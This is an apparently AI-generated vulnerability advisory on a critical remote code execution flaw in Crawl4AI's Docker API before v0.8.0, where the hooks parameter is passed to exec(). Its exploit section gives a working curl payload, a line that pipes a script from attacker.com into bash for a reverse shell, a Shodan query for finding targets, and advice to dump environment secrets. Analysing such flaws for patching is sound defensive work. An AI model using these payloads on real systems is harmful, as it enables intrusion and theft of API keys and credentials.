CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-5882-5RX9-XGXP
10.00.20%

Crawling into a Shell: The Crawl4AI RCE (CVE-2026-26216)

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 17, 2026·6 min read·39 visits

PoC Available

Executive Summary (TL;DR)

A Critical (CVSS 10.0) RCE exists in Crawl4AI's Docker API prior to v0.8.0. The `/crawl` endpoint accepts a `hooks` parameter containing raw Python code, which is passed to `exec()` without authentication or sufficient sandboxing. Attackers can execute arbitrary system commands via a simple HTTP POST request.

In the rush to feed the insatiable maw of Large Language Models, developers are building tools to scrape the web faster and more efficiently than ever before. Crawl4AI is one such tool—a Dockerized, API-driven spider designed to turn HTML into LLM-ready tokens. But in version < 0.8.0, it offered a feature that was a little too helpful: 'Hooks'. These hooks allowed users to execute custom Python code during the crawl process. Unfortunately, the implementation was a textbook case of 'Remote Code Execution as a Service.' By passing unsanitized strings directly into Python's `exec()` function on an unauthenticated endpoint, Crawl4AI inadvertently gave every anonymous internet user root access to the container. It is a classic tale of convenience killing security.

The Hook: A Feature Too Far

In the modern AI ecosystem, data is oil. Crawl4AI positions itself as the pipeline, offering a slick, Dockerized solution to scrape websites and format the content for LLM consumption. It's popular, it's efficient, and like many open-source projects born in the AI boom, it prioritizes velocity and flexibility over rigorous security models. The fatal flaw lies in a feature designed for 'advanced customization' called Hooks.

Hooks are conceptually great. They allow a developer to say, 'Hey, before you parse this HTML, run this little script to click a button or scroll the page.' It turns a static scraper into a dynamic automation tool. In the Crawl4AI Docker API, this was exposed via the /crawl endpoint. You send a JSON payload with a URL, and optionally, a hooks dictionary containing Python scripts to run at various lifecycle events (e.g., on_crawl_start).

The problem is obvious to anyone who has spent more than a week in application security: taking code from a user and running it on your server is practically inviting a compromise. When that server is a Docker container exposing port 9000 to the world, and the endpoint requires zero authentication, you haven't just built a feature; you've built a public shell.

The Flaw: Executing the Executioner

The root cause of CVE-2026-26216 is the use of Python's exec() function on untrusted input. exec() is part of the holy trinity of Python security sins (alongside eval() and pickle.load()). It takes a string of source code and executes it within the current context. It is the programmatic equivalent of handing a loaded gun to a stranger and hoping they only shoot the targets you pointed out.

In the vulnerable versions of Crawl4AI, the application took the string provided in the hooks parameter and passed it straight to exec(). While there might have been some naive attempts to limit the scope—perhaps by not explicitly importing os—Python's dynamic nature makes these restrictions trivial to bypass. If you have access to exec(), you have access to __builtins__. And if you have __builtins__, you have __import__.

This meant that an attacker didn't need to be a wizard. They just needed to know basic Python. By invoking __import__('os').system('...'), they could break out of the Python interpreter's intended logic and execute shell commands directly on the host OS. The lack of authentication on the API meant that this wasn't just an insider threat; it was an open door to the entire internet.

The Code: Anatomy of a Disaster

Let's look at the logic that allowed this to happen. While the exact source code of the vulnerability often varies slightly, the pattern is unmistakably consistent in these types of flaws. The vulnerable code likely looked something like this:

# The Vulnerable Pattern
def process_hooks(hooks, context):
    if 'on_crawl_start' in hooks:
        # DIRECT EXECUTION OF USER INPUT
        exec(hooks['on_crawl_start'], globals(), context)

There is zero sanitation here. The code assumes the user is benevolent. Now, let's look at how the maintainers fixed this in version 0.8.0. The patch involved three critical changes: disabling the feature by default, sanitizing the execution environment, and adding authentication.

# The Fix (Conceptual)
import os
 
# 1. Feature Flag: Disable by default
if not os.getenv('CRAWL4AI_HOOKS_ENABLED', 'false').lower() == 'true':
    raise SecurityError("Hooks are disabled by default.")
 
# 2. Sandboxing (Restricted Globals)
safe_globals = {
    '__builtins__': {},
    'print': print,
    # ... allow-listed functions only
}
 
# 3. Execution with restricted scope
exec(hooks['on_crawl_start'], safe_globals, local_context)

The most important part of the fix is the __builtins__: {} entry in the globals dictionary. This removes access to __import__, open, and other dangerous built-ins, effectively declawing the exec function. However, sandbox escapes in Python are a sport of their own, so the best defense remains the first one: turning the feature off completely.

The Exploit: One Request to Rule Them All

Exploiting CVE-2026-26216 is terrifyingly simple. You don't need complex memory corruption exploits or heap grooming. You just need curl. The target is the /crawl endpoint, typically listening on port 9000.

Here is the full attack chain. First, we identify a target. A Shodan query for port:9000 "Crawl4AI" would light up like a Christmas tree. Once a target is found, we craft a JSON payload injecting our malicious Python code into the on_crawl_start hook.

The Payload:

curl -X POST http://target-ip:9000/crawl \
  -H "Content-Type: application/json" \
  -d '{
    "url": "https://google.com",
    "hooks": {
      "on_crawl_start": "__import__(\"os\").system(\"echo 'pwned' > /tmp/hacked\")"
    }
  }'

Escalating to a Reverse Shell:

To get a full interactive shell, an attacker would simply replace the echo command with a reverse shell payload. Since the container likely has curl or wget installed (it is a web crawler, after all), the attacker can pull down a shell script and pipe it to sh:

"on_crawl_start": "__import__('os').system('curl -s http://attacker.com/rev.sh | bash')"

The server will obediently pause its crawling task to download your malware, execute it, and hand you a terminal. From there, you are root inside the container.

The Impact: Why You Should Panic

You might be thinking, "It's just a Docker container, who cares?" This is a dangerous mindset. In the context of AI applications, the container is often the vault. Why? Environment Variables.

Web crawlers like Crawl4AI are frequently deployed with API keys injected as environment variables—keys for OpenAI, Anthropic, AWS, or database credentials. A simple env command executed via the exploit dumps all of these secrets to the attacker. With an OpenAI API key, an attacker can drain your credits in minutes. With AWS credentials, they can pivot into your cloud infrastructure.

Furthermore, if the Docker container is mounted with sensitive host volumes (e.g., /var/run/docker.sock or host root directories), the container breakout is trivial. The attacker moves from the container to the host, achieving full server compromise. Even without volume mounts, the compromised container can be used as a proxy to attack internal network resources that are not exposed to the public internet.

The Fix: Stopping the Bleeding

If you are running Crawl4AI, check your version immediately. If it is below 0.8.0, you are vulnerable. The primary mitigation is to upgrade to the latest version. The maintainers have sensibly disabled hooks by default.

If you absolutely must use hooks, do not expose the API to the public internet. Ensure it is behind a VPN or strictly firewalled. Additionally, version 0.8.0 introduces support for JWT authentication. Enable it. Operating an unauthenticated Remote Code Execution interface on the open web is not a strategy; it's a suicide note.

For a defense-in-depth approach, ensure your Docker containers run with the least privilege necessary. Do not run processes as root inside the container if it can be avoided (though Crawl4AI's dependencies might make this hard), and never, ever mount the Docker socket unless you want to give away your infrastructure.

Official Patches

Crawl4AI (UncleCode)Release notes for v0.8.0 detailing the security fix.

Technical Appendix

CVSS Score
10.0/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Probability
0.20%
Top 58% most exploited

Affected Systems

Crawl4AI Docker Deployment < v0.8.0Any Python application using Crawl4AI middleware with default hook configurations

Affected Versions Detail

Product
Affected Versions
Fixed Version
Crawl4AI
UncleCode
< 0.8.00.8.0
AttributeDetail
CWE IDCWE-94
Attack VectorNetwork (AV:N)
CVSS v4.010.0 (Critical)
Exploit StatusProof of Concept (PoC) Available
Privileges RequiredNone (PR:N)
User InteractionNone (UI:N)

MITRE ATT&CK Mapping

T1059.006Command and Scripting Interpreter: Python
Execution
T1190Exploit Public-Facing Application
Initial Access
T1552.001Unsecured Credentials: Credentials In Files (Environment Variables)
Credential Access
CWE-94
Improper Control of Generation of Code ('Code Injection')

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Known Exploits & Detection

VulnCheckOriginal advisory detailing the hook injection vector.
NucleiDetection Template Available

Vulnerability Timeline

Vulnerability Discovered
2026-01-16
CVE Published & Patch Released (v0.8.0)
2026-02-12

References & Sources

  • [1]GitHub Advisory: GHSA-5882-5rx9-xgxp
  • [2]NVD Entry for CVE-2026-26216
Related Vulnerabilities
CVE-2026-26216

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.